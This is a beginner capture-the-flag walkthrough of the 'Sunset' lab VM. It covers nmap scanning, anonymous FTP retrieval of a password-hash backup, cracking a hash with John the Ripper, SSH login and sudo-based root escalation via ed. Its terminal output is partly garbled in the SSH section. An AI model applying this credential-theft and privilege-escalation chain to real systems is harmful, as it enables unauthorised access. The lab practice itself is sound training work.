Sunset is another CTF challenge which is meant for the beginner level.The ova file of the box can be download from this site.
Penetration Testing Methodology
Scanning
- Nmap
Enumeration
- Login through ftp
Exploitation & Privilege escalation
- Connect through ssh
- Exploiting sudo rights
Walkthrough
First we launch our Kali Linux, and only after it gets completely booted up, then launch the sunset box.
Scanning:
Arp-Scan
It is used to find the target’s IP address. To do that we use the arp-scan tool.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:53:0c:ba, IPv4: 192.168.1.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:46:45:0d:5d:81 Shanghai Infinity Wireless Technologies Co.,Ltd.
192.168.1.2 18:0f:76:c7:66:34 D-Link International
192.168.1.6 94:a6:7e:b3:4f:ca NETGEAR
192.168.1.7 c8:21:58:c7:9f:de Intel Corporate
192.168.1.17 54:14:f3:b3:3b:48 Intel Corporate
192.168.1.94 78:af:08:80:8e:41 Intel Corporate
192.168.1.130 08:00:27:a9:d1:64 PCS Systemtechnik GmbH
15 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.967 seconds (130.15 hosts/sec). 7 responded
In the results look for a device whose MAC address starts with a 08 if using vbox or 00 if using vmware. The corresponding IP will be the target IP.
Nmap
Now we need to scan that IP for open ports, services etc to gather info about it. So to do that we use the nmap tool.
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.1.130 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-22 02:52 EDT
Nmap scan report for 192.168.1.130
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.130:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
MAC Address: 08:00:27:A9:D1:64 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms 192.168.1.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
Enumeration:
FTP
We can now try to access it through the FTP port.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 192.168.1.130
Connected to 192.168.1.130.
220 pyftpdlib 1.5.5 ready.
Name (192.168.1.130:kali): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||46071|).
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
229 Entering extended passive mode (|||37077|).
125 Data connection already open. Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 1062 405.43 KiB/s 00:00 ETA
226 Transfer complete.
1062 bytes received in 00:00 (337.93 KiB/s)
ftp> exit
221 Goodbye.
To get access into the FTP connection we logged in as Name : anonymous Password : anonymous.
This is because we had previously found that anonymous ftp login was possible in the nmap scan.
Then we use ls commad to see what files were available there.
And we got a file named backup.
Now we cannot use cat command with in an ftp terminal, so we use the command get backup to transfer it to our system.
Then we end the ftp connection with exit.
Now in our terminal we view the contents of the backup file with the command cat backup.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
Now we got some credentials but the passwords are in hashed format.
John The Ripper
To crack the hashes we use a tool called John The Ripper. So first we copy the hash of the user sunset from the credentials and copy it into another file with a name of own choice. Here let’s say that file is named as hash. Now the command to crack the hash is simply john hash (note the hash here is the name of the file you created) at least in this box’s case.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john sunset
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
cheer14 (?)
1g 0:00:01:33 DONE 3/3 (2023-09-22 03:34) 0.01075g/s 3472p/s 3472c/s 3472C/s secrina..cariell
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The result we got that is cheer14. This is the password of the user sunset.
Exploitation & Privilege escalation :
SSH
Now start a secure shell through which we can access the target system. To do that the command we use is
ssh username@targetIP
After successfully logged in to the target system as the user sunset
list the files that are available, to see a user.txt file. And we cat that file to get the user flag.
┌──(root㉿kali)-[/home/kali/Desktop]
└─#ssh sunset@192.168.1.130
The authenticity of host '192.168.1.130 (192.168.1.130) can't be established. ED25519 key fingerprint is SHA25:eJPU2yXc6mt/1NYIC1rQJ8kyxsVoxaIPzke JqovAOy.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/fingerprint])? yes Warning: Permanently added 192. (ED25519) to the list of known hosts.
sunset@192.168.18.140's password:
Linux sunset 4.19.8-5-amd64 #1 SMP Debian 4.19.37-5+debloul (2019-07-19) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms For each program are described in the
individual files in /usr/share/doc//copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.130
sunsetasunset:-$ 1s
user. Ext
sunset@sunset: $ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
sunset@sunset: $
Now we need to find the root flag too. It will generally be in /root directory. So we try to cd to /root.
We don’t have permission. So check the sudo vectors with sudo -l . We can see that the user sunset can run /usr/bin/ed without root permission.
GTFOBins
Search the .ed in the GTFOBins site .
Select sudo function
Copy that code and paste it in the sunset ssh connecction, to finally become root.Simply cd to /root directory and ls to see that there is a flag.txt which is the root flag.
Completed it!
If you struggle during an attempt to root a box, don’t give up! Otherwise, you’ll never know the feeling when you got a root shell after many hours, days or even weeks worth of effort!
BYE :)